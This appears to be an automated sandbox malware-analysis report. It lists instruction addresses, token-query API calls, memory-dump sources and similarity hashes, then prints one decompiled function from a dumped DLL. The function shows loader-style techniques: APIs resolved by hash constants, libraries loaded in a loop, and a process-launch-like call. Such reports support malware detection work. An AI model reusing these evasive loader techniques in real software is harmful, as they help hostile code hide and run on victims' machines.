0x6ea04ecd
0x6ea04e87
0x6ea04e87
0x6ea04e87
0x6ea04e89
0x6ea04e8b
0x6ea04e95
0x6ea04e96
0x6ea04e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04e9c
0x6ea04f06
0x6ea04f0c
0x6ea04ed2
0x6ea04ed4
0x6ea04ee5
0x6ea04eda
0x00000000
0x6ea04ee0
0x00000000
0x6ea04ee0
0x6ea04ed6
0x6ea04ed6
0x6ea04ed7
0x6ea04ed7
0x6ea04f0e
0x00000000
0x6ea04f0e
0x00000000
0x6ea04e9e
0x6ea04e9e
0x6ea04ea4
0x6ea04ea4
0x6ea04eaa
0x00000000
0x6ea04e87
0x6ea04e85
0x6ea049cb
0x6ea049cb
0x6ea049d6
0x6ea049df
0x6ea049e4
0x6ea049e9
0x6ea049ef
0x6ea049f7
0x6ea04a01
0x6ea04e62
0x00000000
0x6ea04a07
0x6ea04a09
0x6ea04a36
0x6ea04a3b
0x6ea04a41
0x6ea04a45
0x6ea04e39
0x6ea04e44
0x6ea04e4a
0x6ea04e4a
0x6ea04e39
0x6ea04a4d
0x00000000
0x6ea04a53
0x6ea04a5a
0x6ea04a62
0x00000000
0x6ea04a62
0x6ea04a0b
0x6ea04a0b
0x6ea04a0b
0x6ea04a0d
0x6ea04a0f
0x6ea04a1d
0x6ea04a1e
0x6ea04a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04a24
0x6ea04e51
0x6ea04e57
0x6ea04a64
0x6ea04a66
0x6ea04bef
0x6ea04bf2
0x6ea04bfc
0x6ea04c02
0x6ea04c02
0x6ea04c0e
0x6ea04a6c
0x6ea04a76
0x6ea04a77
0x6ea04a78
0x6ea04a79
0x6ea04a7a
0x6ea04a7b
0x6ea04a7c
0x6ea04a7d
0x6ea04a82
0x6ea04a84
0x6ea04a86
0x6ea04a8b
0x6ea04d80
0x6ea04d8c
0x6ea04e21
0x00000000
0x6ea04d92
0x6ea04d94
0x6ea04dbf
0x6ea04dc4
0x6ea04dca
0x6ea04dce
0x6ea04e06
0x6ea04e0d
0x6ea04e13
0x6ea04e13
0x6ea04e06
0x6ea04dd2
0x00000000
0x6ea04dd4
0x6ea04ddb
0x6ea04dde
0x00000000
0x6ea04dde
0x6ea04d96
0x6ea04d98
0x6ea04d98
0x6ea04d9a
0x6ea04d9c
0x6ea04da6
0x6ea04da7
0x6ea04dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04dad
0x6ea04e17
0x6ea04e1d
0x6ea04de3
0x6ea04de5
0x6ea04df6
0x6ea04deb
0x00000000
0x6ea04df1
0x00000000
0x6ea04df1
0x6ea04de7
0x6ea04de7
0x6ea04de8
0x6ea04de8
0x6ea04e1f
0x00000000
0x6ea04e1f
0x00000000
0x6ea04daf
0x6ea04daf
0x6ea04db5
0x6ea04db5
0x6ea04dbb
0x00000000
0x6ea04d98
0x6ea04d94
0x6ea04a91
0x6ea04a91
0x6ea04a91
0x6ea04a99
0x6ea04b47
0x6ea04b49
0x6ea04b54
0x6ea04b50
0x6ea04b50
0x6ea04b50
0x6ea04b5b
0x6ea04bcf
0x6ea04bd2
0x6ea04bdc
0x6ea04be2
0x6ea04be2
0x6ea04bee
0x6ea04b5d
0x6ea04b5d
0x6ea04b69
0x6ea04d2d
0x00000000
0x6ea04b6f
0x6ea04b71
0x6ea04ba0
0x6ea04ba5
0x6ea04bab
0x6ea04baf
0x6ea04d04
0x6ea04d0f
0x6ea04d15
0x6ea04d15
0x6ea04d04
0x6ea04bb7
0x00000000
0x6ea04bb9
0x6ea04bc0
0x6ea04bc3
0x00000000
0x6ea04bc3
0x6ea04b73
0x6ea04b75
0x6ea04b75
0x6ea04b77
0x6ea04b79
0x6ea04b87
0x6ea04b88
0x6ea04b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04b8e
0x6ea04d1c
0x6ea04d22
0x6ea04bc8
0x6ea04bca
0x00000000
0x6ea04bcc
0x6ea04bcc
0x6ea04bcd
0x6ea04bce
0x6ea04bce
0x6ea04d28
0x00000000
0x6ea04d28
0x00000000
0x6ea04b90
0x6ea04b90
0x6ea04b96
0x6ea04b96
0x6ea04b9c
0x00000000
0x6ea04b75
0x6ea04b71
0x6ea04b69
0x6ea04a9f
0x6ea04aa1
0x6ea04aa5
0x6ea04aa9
0x6ea04aab
0x6ea04aaf
0x6ea04ab1
0x6ea04ab1
0x6ea04abd
0x6ea04d71
0x00000000
0x6ea04ac3
0x6ea04ac5
0x6ea04af4
0x6ea04af9
0x6ea04aff
0x6ea04b03
0x6ea04d48
0x6ea04d53
0x6ea04d59
0x6ea04d59
0x6ea04d48
0x6ea04b0b
0x00000000
0x6ea04b0d
0x6ea04b14
0x6ea04b17
0x00000000
0x6ea04b17
0x6ea04ac7
0x6ea04ac9
0x6ea04ac9
0x6ea04acb
0x6ea04acd
0x6ea04adb
0x6ea04adc
0x6ea04ae2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04ae2
0x6ea04d60
0x6ea04d66
0x6ea04b1c
0x6ea04b1e
0x00000000
0x6ea04b20
0x6ea04b20
0x6ea04b24
0x6ea04b28
0x6ea04b29
0x6ea04b29
0x6ea04d6c
0x00000000
0x6ea04d6c
0x00000000
0x6ea04ae4
0x6ea04ae4
0x6ea04aea
0x6ea04aea
0x6ea04af0
0x00000000
0x6ea04ac9
0x6ea04ac5
0x00000000
0x6ea04b32
0x6ea04b32
0x6ea04b33
0x6ea04b3b
0x6ea04b3f
0x00000000
0x6ea04b43
0x6ea04a99
0x6ea04a8b
0x6ea04e5d
0x00000000
0x6ea04e5d
0x00000000
0x6ea04a26
0x6ea04a26
0x6ea04a2c
0x6ea04a2c
0x6ea04a32
0x00000000
0x6ea04a0b
0x6ea04a09
0x6ea04a01
0x6ea0497d
0x6ea0497d
0x6ea04980
0x6ea0498a
0x6ea04990
0x6ea04990
0x6ea0499c
0x6ea0499c
0x6ea04f4c
0x00000000
0x6ea04f4c
0x00000000
0x6ea0493f
0x6ea0493f
0x6ea04945
0x6ea04945
0x6ea0494b
0x00000000
0x6ea04924
0x6ea04922
0x6ea048ec
0x6ea048f1
0x6ea048f7
0x6ea048f7
0x00000000
0x6ea048f1
0x6ea048cb
0x6ea048da
0x6ea048de
0x6ea04f60
0x6ea04f6c
0x6ea04fda
0x00000000
0x6ea04f6e
0x6ea04f70
0x6ea04f99
0x6ea04f9e
0x6ea04fa4
0x6ea04fa8
0x6ea04ff2
0x6ea04ff9
0x6ea04fff
0x6ea04fff
0x6ea04ff2
0x6ea04fac
0x00000000
0x6ea04fb2
0x6ea04fb9
0x6ea04fbc
0x00000000
0x6ea04fbc
0x6ea04f72
0x6ea04f72
0x6ea04f72
0x6ea04f74
0x6ea04f76
0x6ea04f80
0x6ea04f81
0x6ea04f87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04f87
0x6ea04fd0
0x6ea04fd6
0x6ea04fc1
0x6ea04fc3
0x00000000
0x6ea04fc9
0x6ea04fc9
0x6ea04fca
0x6ea04fca
0x6ea04fd8
0x00000000
0x6ea04fd8
0x00000000
0x6ea04f89
0x6ea04f89
0x6ea04f8f
0x6ea04f8f
0x6ea04f95
0x00000000
0x6ea04f72
0x6ea04f70
0x00000000
0x00000000
0x00000000
0x6ea048de
0x6ea05033
0x00000000
0x6ea05033
0x00000000
0x6ea0488d
0x6ea0488d
0x6ea04893
0x6ea04893
0x6ea04899
0x00000000
0x6ea04872
0x6ea04870
0x6ea04868
0x6ea04841
0x6ea050de
0x00000000
0x6ea050de
0x00000000
0x6ea047ee
0x6ea047ee
0x6ea047f4
0x6ea047f4
0x6ea047fa
0x00000000
0x6ea047d3
0x6ea047d1
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 6EA048DA
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?,00000000), ref: 6EA049C1

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 0ad8bd05caca1535801e3d674a53a489668675a2fe74b3bc8a179194f7a67146
Instruction ID: 6f0a99ed829a5ab3781d6e4ef2c0747ac2afdf70b8d431533a584e78bafa8969
Opcode Fuzzy Hash: 0ad8bd05caca1535801e3d674a53a489668675a2fe74b3bc8a179194f7a67146
Instruction Fuzzy Hash: D51208307043438FE754DAE9AAE07AA32D97BA160CF1C8A7DD451DB295EB34CCC6C259

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F543B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E9F543B() {
				signed int _t131;
				void* _t134;
				signed int _t142;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t170;
				intOrPtr _t171;
				intOrPtr* _t175;
				void* _t190;
				void* _t200;
				intOrPtr _t203;
				signed int _t213;
				signed int _t217;
				void* _t232;
				intOrPtr* _t233;
				signed int _t236;
				unsigned int _t240;
				intOrPtr _t243;
				signed short* _t244;
				signed int _t247;
				void* _t265;
				void* _t273;
				signed int _t276;
				signed int _t277;
				signed int _t280;
				signed int _t281;
				intOrPtr* _t325;
				intOrPtr* _t333;
				signed int _t348;
				signed int _t350;
				signed int _t353;
				intOrPtr* _t385;
				void* _t400;
				signed int _t401;
				void* _t406;
				signed int _t407;
				intOrPtr* _t410;
				void* _t413;
				intOrPtr* _t416;

				asm("outsb");
				_t410 = E6EA03930(_t273, 0, _t400, _t404);
				if( *_t410 < 0x10) {
					L6E9F5150();
				}
				E6E9F6020(_t273);
				E6EA08810(_t416 + 0x114, 0x200);
				_t385 = L6EA015C0(0xa1310f65, 0xc4d11e8a);
				if(_t385 != 0) {
					 *_t385(0,  *(_t416 + 0x114),  *(_t416 + 0x114) >> 1);
				}
				E6EA02580(_t416 + 0x118, _t400, _t404);
				if(E6EA09C70(_t416 + 0x114, _t400,  *((intOrPtr*)(_t416 + 0x118))) == 0) {
					E6EA02780(_t416 + 0xe4, _t400, _t404);
					_t131 = E6EA09C70(_t416 + 0x114, _t400,  *((intOrPtr*)(_t416 + 0xe4)));
					__eflags = _t131;
					if(_t131 == 0) {
						E6EA02580(_t416 + 0xb4, _t400, _t404);
						_t404 = _t416 + 0x98;
						E6EA0D980(_t416 + 0xbc, _t416 + 0x98, 0x5c);
						_t134 = E6EA17600(_t416 + 0x98, 2);
						E6E9FAC00(_t416 + 0xbc, 6);
						E6EA08CC0(_t134,  *((intOrPtr*)(_t416 + 0xbc)));
						E6EA08CA0(_t416 + 0xbc);
						L6EA189F0(_t404, _t416 + 0x124, 0x5c);
						L6EA18910(_t404, _t400, _t404);
						E6EA08CA0(_t416 + 0xb4);
						_t142 = E6EA09C70(_t416 + 0x114, _t400,  *((intOrPtr*)(_t416 + 0x120)));
						__eflags = _t142;
						_t23 = _t142 > 0;
						__eflags = _t23;
						_t276 = 0 | _t23;
						E6EA08CA0(_t416 + 0x120);
					} else {
						_t276 = 1;
					}
					E6EA08CA0(_t416 + 0xe4);
					E6EA08CA0(_t416 + 0x118);
					__eflags = _t276;
					if(_t276 == 0) {
						_t277 = 0;
						__eflags = 0;
					} else {
						goto L11;
					}
				} else {
					E6EA08CA0(_t416 + 0x118);
					L11:
					_t277 = 1;
				}
				E6E9FAC00(_t416 + 0x120, 2);
				E6EA0D980(_t416 + 0x128, _t416 + 0x130, 0x7e);
				E6EA08CA0(_t416 + 0x120);
				if( *(_t416 + 0x130) > 0) {
					 *_t416 = _t410;
					_t401 = _t416 + 0x130;
					L15:
					while(1) {
						L15:
						while(1) {
							L15:
							if(L6EA015C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E6EA17600(_t401, _t404))); // executed
							}
							_t265 =  *(_t416 + 0x130);
							while(1) {
								_t404 = 1;
								if(1 >= _t265) {
									break;
								}
								if(1 != 4) {
									goto L15;
								} else {
									_t388 =  *0x6ea2b02a & 0x000000ff;
									if(( *0x6ea2b02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L23;
							}
							_t410 =  *_t416;
							goto L23;
						}
					}
				}
				L23:
				__eflags =  *((intOrPtr*)(_t410 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t410 + 0x2c)) != 2) {
					__eflags =  *0x6ea2b028 & 0x000000ff;
					if(( *0x6ea2b028 & 0x000000ff) == 0) {
						__eflags =  *0x6ea2b265 & 0x000000ff;
						if(( *0x6ea2b265 & 0x000000ff) == 0) {
							__eflags =  *0x6ea2b1cc - 1;
							if( *0x6ea2b1cc != 1) {
								_t243 =  *0x6ea2b1d0; // 0x900980
								_t244 =  *(_t243 + 4);
								_t388 =  *_t244 & 0x0000ffff;
								__eflags = ( *_t244 & 0x0000ffff) - 0x2d;
								if(( *_t244 & 0x0000ffff) != 0x2d) {
									E6EA08AB0(_t416 + 0xcc, _t244, 0);
									_push(0x80);
									_push(0);
									E6EA1A4E0(_t416 + 0x68, __eflags,  *((intOrPtr*)(_t416 + 0xd0)), 1);
									_t247 = E6EA1BEA0(_t416 + 0x64, _t388, _t404);
									__eflags = _t247;
									if(_t247 == 0) {
										__eflags =  *((char*)(_t416 + 0x68));
										if( *((char*)(_t416 + 0x68)) != 0) {
											E6EA1BE30(_t416 + 0x64, _t404);
										}
										E6EA08CA0(_t416 + 0x58);
										_t407 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E6EA1A730(_t416 + 0xc4, _t388);
											if(__eflags == 0) {
												break;
											}
											E6EA022A0(0x64, _t388);
											_t407 = _t407 + 1;
											__eflags = _t407 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t404 = _t416 + 0xcc;
										do {
											E6EA0AE80(_t416 + 0xcc, __eflags, _t404, 0x5c);
											E6EA08CC0(_t416 + 0xc8,  *(_t416 + 0xcc));
											E6EA08CA0(_t404);
											__eflags = E6EA1A730(_t416 + 0xc4, _t388);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t416 + 0x68));
										if( *((char*)(_t416 + 0x68)) != 0) {
											E6EA1BE30(_t416 + 0x64, _t404);
										}
										E6EA08CA0(_t416 + 0x58);
									}
									E6EA08CA0(_t416 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x6ea2b02a & 0x000000ff) - 2;
					if(( *0x6ea2b02a & 0x000000ff) == 2) {
						L52:
						_t152 =  *0x6ea2b1ad; // 0xbaa380
						__eflags = _t152;
						if(_t152 == 0) {
							L54:
							_t153 =  *0x6ea2b1ad; // 0xbaa380
							__eflags = _t153;
							if(_t153 == 0) {
								_push(0x10);
								_t154 = E6EA01030();
								_t416 = _t416 + 4;
								__eflags = _t154;
								if(_t154 != 0) {
									_push(0);
									_t155 = E6EA19350(_t154);
								} else {
									_t155 = 0;
								}
								 *0x6ea2b1ad = _t155;
							}
							_t404 =  *0x6ea2b1ad; // 0xbaa380
							__eflags = ( *0x6ea2b02a & 0x000000ff) - 1;
							if(( *0x6ea2b02a & 0x000000ff) == 1) {
								_t388 = 0x18f8c844;
								_t401 = _t416 + 0x28;
								E6E9F6AD0(_t277, _t401, 0x18f8c844, _t401, _t404, 1, 0);
								_push(_t401);
								L6EA19520(_t404);
								L6EA19510(_t401);
							} else {
								E6EA19710(_t404, 0x6ea2b02d,  *0x6ea2b02b & 0x0000ffff);
							}
						} else {
							_t350 =  *0x6ea2b1ad; // 0xbaa380
							_t217 = E6EA19660(_t350);
							__eflags = _t217;
							if(_t217 != 0) {
								goto L54;
							}
						}
						_t160 =  *0x6ea2b1b1; // 0x0
						__eflags = _t160;
						if(_t160 == 0) {
							L60:
							_t161 =  *0x6ea2b1b1; // 0x0
							__eflags = _t161;
							if(_t161 == 0) {
								_push(0x10);
								_t162 = E6EA01030();
								_t416 = _t416 + 4;
								__eflags = _t162;
								if(_t162 != 0) {
									_push(0);
									_t163 = E6EA19350(_t162);
								} else {
									_t163 = 0;
								}
								 *0x6ea2b1b1 = _t163;
							}
							_t401 =  *0x6ea2b1b1; // 0x0
							__eflags = ( *0x6ea2b02a & 0x000000ff) - 1;
							if(( *0x6ea2b02a & 0x000000ff) == 1) {
								_t388 = 0x11041f01;
								E6E9F6AD0(_t277, _t416 + 0x38, 0x11041f01, _t401, _t404, 1, 1);
								_push(_t416 + 0x38);
								L6EA19520(_t401);
								L6EA19510(_t416 + 0x38);
								_t170 = E6EA19650(_t401);
								__eflags = _t170;
								if(_t170 != 0) {
									_t388 = 0xd3ef7577;
									E6E9F6AD0(_t277, _t416 + 8, 0xd3ef7577, _t401, _t404, 0, 0);
									L6EA19510(_t416);
								}
							} else {
								_t404 =  *0x6ea2b1c4; // 0x6e9f0000
								__eflags =  *((char*)(E6EA03930(_t277, 0, _t401, _t404) + 0xb)) - 0x20;
								_t397 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t388 = _t404;
								E6E9F9090(_t416 + 0x88, _t404,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t416 + 0x88);
								L6EA19520(_t401);
								L6EA19510(_t416 + 0x88);
							}
						} else {
							_t348 =  *0x6ea2b1b1; // 0x0
							_t213 = E6EA19660(_t348);
							__eflags = _t213;
							if(_t213 != 0) {
								goto L60;
							}
						}
						_t171 =  *((intOrPtr*)(_t410 + 0x2c));
						__eflags = _t171 - 3;
						if(_t171 == 3) {
							__eflags =  *0x6ea2b1cc - 3;
							if( *0x6ea2b1cc == 3) {
								E6EA08CC0(_t416 + 0x10c,  *((intOrPtr*)( *0x6ea2b1d0 + 8)));
							}
							_t278 = _t416 + 0x48;
							E6EA08810(_t416 + 0x48, 0);
							_t175 = E6EA09890(_t278, _t416 + 0x48, _t388, _t401, _t404, _t278, 0x6ea29428,  *((intOrPtr*)(_t410 + 0x2c)));
							E6EA10220(_t416 + 0x110,  *_t175, 0);
							E6EA08CA0(_t278);
							L6E9F8180(_t404);
						} else {
							__eflags = _t171 - 5;
							if(_t171 != 5) {
								__eflags = _t171 - 6;
								if(__eflags == 0) {
									_t325 = _t416 + 0xa4;
									 *_t325 = 0;
									 *((intOrPtr*)(_t325 + 4)) = 0;
									 *((intOrPtr*)(_t325 + 8)) = 0;
									 *((intOrPtr*)(_t325 + 0xc)) = 0;
									E6EA05B60(_t277, _t325, _t401, _t404, __eflags);
									E6E9F6740(_t416 + 0xa4);
									E6EA01350(0x12);
									__eflags =  *(_t416 + 0xa8);
									if( *(_t416 + 0xa8) > 0) {
										_t280 = 0;
										__eflags = 0;
										do {
											_t190 = E6EA22B00(_t416 + 0xa8, _t280);
											__eflags =  *((char*)(_t190 + 0x3c));
											if( *((char*)(_t190 + 0x3c)) == 0) {
												E6E9F2A40(_t416 + 0x50, _t190);
												E6EA08CA0(_t416 + 0x50);
											}
											_t280 = _t280 + 1;
											__eflags = _t280 -  *(_t416 + 0xa8);
										} while (_t280 <  *(_t416 + 0xa8));
									}
									L6EA22970(_t277, _t416 + 0xa4, _t401);
									_t329 =  *(_t416 + 0xb0);
									__eflags =  *(_t416 + 0xb0);
									if( *(_t416 + 0xb0) != 0) {
										E6E9F2A20(_t329, 1);
									}
								}
							} else {
								__eflags = _t277;
								if(_t277 == 0) {
									__eflags =  *0x6ea2b1cc - 1;
									if(__eflags <= 0) {
										L69:
										_t333 = _t416 + 0x18;
										 *_t333 = 0;
										 *((intOrPtr*)(_t333 + 4)) = 0;
										 *((intOrPtr*)(_t333 + 8)) = 0;
										 *((intOrPtr*)(_t333 + 0xc)) = 0;
										E6EA05B60(_t277, _t333, _t401, _t404, __eflags);
										__eflags = ( *0x6ea2b029 & 0x000000ff) - 1;
										E6E9F7DB0(_t416 + 0x18, 0 | ( *0x6ea2b029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x6ea2b029 & 0x000000ff;
										if(( *0x6ea2b029 & 0x000000ff) != 0) {
											E6EA01350(0x12);
											__eflags =  *(_t416 + 0x1c);
											if( *(_t416 + 0x1c) > 0) {
												_t281 = 0;
												__eflags = 0;
												do {
													_t200 = E6EA22B00(_t416 + 0x1c, _t281);
													__eflags =  *((char*)(_t200 + 0x3c));
													if( *((char*)(_t200 + 0x3c)) == 0) {
														E6E9F2A40(_t416 + 0x10, _t200);
														E6EA08CA0(_t416 + 0x10);
													}
													_t281 = _t281 + 1;
													__eflags = _t281 -  *(_t416 + 0x1c);
												} while (_t281 <  *(_t416 + 0x1c));
											}
										}
										L6EA22970(_t277, _t416 + 0x18, _t401);
										_t336 =  *(_t416 + 0x24);
										__eflags =  *(_t416 + 0x24);
										if( *(_t416 + 0x24) != 0) {
											E6E9F2A20(_t336, 1);
										}
									} else {
										_t203 =  *0x6ea2b1d0; // 0x900980
										__eflags = ( *( *(_t203 + 4)) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L69;
										}
									}
								}
							}
						}
						L6EA18910(_t416 + 0x130, _t401, _t404);
						E6EA08CA0(_t416 + 0x110);
						E6EA08CA0(_t416 + 0x108);
						E6EA07A70(_t416 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x6ea2b027 & 0x000000ff;
						if(( *0x6ea2b027 & 0x000000ff) == 0) {
							goto L52;
						} else {
							__eflags = _t277;
							if(_t277 != 0) {
								goto L52;
							} else {
								__eflags =  *((char*)(_t410 + 0xb)) - 0x20;
								_t399 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								E6E9F61B0(_t416 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t410 + 0xb)) - 0x20);
								E6EA08810(_t416 + 0x18, 0x200);
								_t353 = L6EA015C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t353;
								if(__eflags != 0) {
									_t240 =  *(_t416 + 0x18) >> 1;
									__eflags = _t240;
									_t399 =  *0x6ea2b1c4; // 0x6e9f0000
									 *_t353(_t399,  *(_t416 + 0x18), _t240);
								}
								_push(0x80);
								_push(0);
								E6EA1A4E0(_t416 + 0x10, __eflags,  *((intOrPtr*)(_t416 + 0x20)), 1);
								L6EA1A520(_t416 + 8, _t399, _t416 + 0x1c, 0);
								__eflags =  *((char*)(_t416 + 0x10));
								if( *((char*)(_t416 + 0x10)) != 0) {
									E6EA1BE30(_t416 + 0xc, _t404);
								}
								__eflags = 0;
								E6EA08CA0(_t416);
								_t406 = _t416 + 0x1a0;
								_t413 = _t416 + 0x2c;
								while(1) {
									E6EA00B70(_t406, 0, 0x44);
									 *((intOrPtr*)(_t416 + 0x1ac)) = 0x44;
									E6EA00B70(_t413, 0, 0x10);
									_t416 = _t416 + 0x18;
									E6EA08810(_t416 + 0x4c, 0);
									_t232 = E6EA096D0(E6EA096D0(E6EA10220(_t416 + 0x50,  *((intOrPtr*)(_t416 + 0x40)), 0), 0x20), 0x22);
									_t233 =  *0x6ea2b1d0; // 0x900980
									E6EA096D0(E6EA10220(_t232,  *_t233, 0), 0x22);
									_t236 = L6EA015C0(0xa1310f65, 0x643f303c);
									__eflags = _t236;
									if(_t236 != 0) {
										break;
									}
									E6EA08CA0(_t416 + 0x48);
								}
								_push(_t413);
								_push(_t406);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t416 + 0x68)));
								_push( *((intOrPtr*)(_t416 + 0x60)));
								asm("int3");
								return _t236;
							}
						}
					}
				} else {
					L6EA18910(_t416 + 0x130, _t400, _t404);
					E6EA08CA0(_t416 + 0x110);
					E6EA08CA0(_t416 + 0x108);
					E6EA07A70(_t416 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x6e9f543d
0x6e9f5451
0x6e9f5457
0x6e9f5459
0x6e9f5459
0x6e9f545e
0x6e9f546f
0x6e9f5483
0x6e9f5487
0x6e9f549c
0x6e9f549c
0x6e9f54a5
0x6e9f54bf
0x6e9f54d9
0x6e9f54ec
0x6e9f54f1
0x6e9f54f3
0x6e9f5506
0x6e9f550b
0x6e9f551c
0x6e9f5525
0x6e9f5538
0x6e9f5546
0x6e9f5552
0x6e9f5563
0x6e9f556a
0x6e9f5576
0x6e9f5589
0x6e9f5590
0x6e9f5599
0x6e9f5599
0x6e9f5599
0x6e9f559c
0x6e9f54f5
0x6e9f54f5
0x6e9f54f5
0x6e9f55a8
0x6e9f55b4
0x6e9f55b9
0x6e9f55bb
0x6e9f55c4
0x6e9f55c4
0x00000000
0x00000000
0x00000000
0x6e9f54c1
0x6e9f54c8
0x6e9f55bd
0x6e9f55bd
0x6e9f55bd
0x6e9f55d2
0x6e9f55e8
0x6e9f55f4
0x6e9f5601
0x6e9f5603
0x6e9f5608
0x00000000
0x6e9f560f
0x00000000
0x6e9f560f
0x6e9f560f
0x6e9f5622
0x6e9f562e
0x6e9f562e
0x6e9f5630
0x6e9f5637
0x6e9f5637
0x6e9f563a
0x00000000
0x00000000
0x6e9f563f
0x00000000
0x6e9f5641
0x6e9f5641
0x6e9f564b
0x00000000
0x6e9f564d
0x00000000
0x6e9f564d
0x6e9f564b
0x00000000
0x6e9f563f
0x6e9f564f
0x00000000
0x6e9f564f
0x6e9f560f
0x6e9f560f
0x6e9f5652
0x6e9f5652
0x6e9f5656
0x6e9f569c
0x6e9f569e
0x6e9f56ab
0x6e9f56ad
0x6e9f56b3
0x6e9f56ba
0x6e9f56c0
0x6e9f56c5
0x6e9f56c8
0x6e9f56cb
0x6e9f56ce
0x6e9f56de
0x6e9f56e3
0x6e9f56e8
0x6e9f56f7
0x6e9f5700
0x6e9f5705
0x6e9f5707
0x6e9f5724
0x6e9f5729
0x6e9f572f
0x6e9f572f
0x6e9f5738
0x6e9f573d
0x6e9f573d
0x6e9f573f
0x6e9f574b
0x6e9f574d
0x00000000
0x00000000
0x6e9f5754
0x6e9f5759
0x6e9f575a
0x6e9f575d
0x00000000
0x00000000
0x00000000
0x6e9f575d
0x6e9f575f
0x6e9f5766
0x6e9f5770
0x6e9f5783
0x6e9f578a
0x6e9f579b
0x6e9f579b
0x6e9f5709
0x6e9f5709
0x6e9f570e
0x6e9f5714
0x6e9f5714
0x6e9f571d
0x6e9f571d
0x6e9f57a6
0x6e9f57a6
0x6e9f56ce
0x6e9f56ba
0x6e9f56ad
0x6e9f57b2
0x6e9f57b5
0x6e9f5b3c
0x6e9f5b3c
0x6e9f5b41
0x6e9f5b43
0x6e9f5b54
0x6e9f5b54
0x6e9f5b59
0x6e9f5b5b
0x6e9f5e33
0x6e9f5e35
0x6e9f5e3a
0x6e9f5e3d
0x6e9f5e3f
0x6e9f5e47
0x6e9f5e49
0x6e9f5e41
0x6e9f5e41
0x6e9f5e41
0x6e9f5e4e
0x6e9f5e4e
0x6e9f5b61
0x6e9f5b6e
0x6e9f5b71
0x6e9f5e0b
0x6e9f5e10
0x6e9f5e1a
0x6e9f5e21
0x6e9f5e22
0x6e9f5e29
0x6e9f5b77
0x6e9f5b86
0x6e9f5b86
0x6e9f5b45
0x6e9f5b45
0x6e9f5b4b
0x6e9f5b50
0x6e9f5b52
0x00000000
0x00000000
0x6e9f5b52
0x6e9f5b92
0x6e9f5b97
0x6e9f5b99
0x6e9f5baa
0x6e9f5baa
0x6e9f5baf
0x6e9f5bb1
0x6e9f5eb0
0x6e9f5eb2
0x6e9f5eb7
0x6e9f5eba
0x6e9f5ebc
0x6e9f5ec4
0x6e9f5ec6
0x6e9f5ebe
0x6e9f5ebe
0x6e9f5ebe
0x6e9f5ecb
0x6e9f5ecb
0x6e9f5bb7
0x6e9f5bc4
0x6e9f5bc7
0x6e9f5e62
0x6e9f5e68
0x6e9f5e73
0x6e9f5e74
0x6e9f5e7d
0x6e9f5e84
0x6e9f5e89
0x6e9f5e8b
0x6e9f5e93
0x6e9f5e9e
0x6e9f5ea6
0x6e9f5ea6
0x6e9f5bcd
0x6e9f5bcf
0x6e9f5be8
0x6e9f5bf1
0x6e9f5bf5
0x6e9f5bf7
0x6e9f5c05
0x6e9f5c06
0x6e9f5c12
0x6e9f5c12
0x6e9f5b9b
0x6e9f5b9b
0x6e9f5ba1
0x6e9f5ba6
0x6e9f5ba8
0x00000000
0x00000000
0x6e9f5ba8
0x6e9f5c1e
0x6e9f5c21
0x6e9f5c24
0x6e9f5d87
0x6e9f5d8e
0x6e9f5ee4
0x6e9f5ee4
0x6e9f5d94
0x6e9f5d9c
0x6e9f5daa
0x6e9f5dbd
0x6e9f5dc4
0x6e9f5dc9
0x6e9f5c2a
0x6e9f5c2a
0x6e9f5c2d
0x6e9f5cf0
0x6e9f5cf3
0x6e9f5cfb
0x6e9f5d02
0x6e9f5d04
0x6e9f5d07
0x6e9f5d0a
0x6e9f5d0d
0x6e9f5d1b
0x6e9f5d25
0x6e9f5d2a
0x6e9f5d32
0x6e9f5d34
0x6e9f5d34
0x6e9f5d36
0x6e9f5d3e
0x6e9f5d43
0x6e9f5d47
0x6e9f5d4f
0x6e9f5d58
0x6e9f5d58
0x6e9f5d5d
0x6e9f5d5e
0x6e9f5d5e
0x6e9f5d36
0x6e9f5d6e
0x6e9f5d73
0x6e9f5d7a
0x6e9f5d7c
0x6e9f5d80
0x6e9f5d80
0x6e9f5d7c
0x6e9f5c33
0x6e9f5c33
0x6e9f5c35
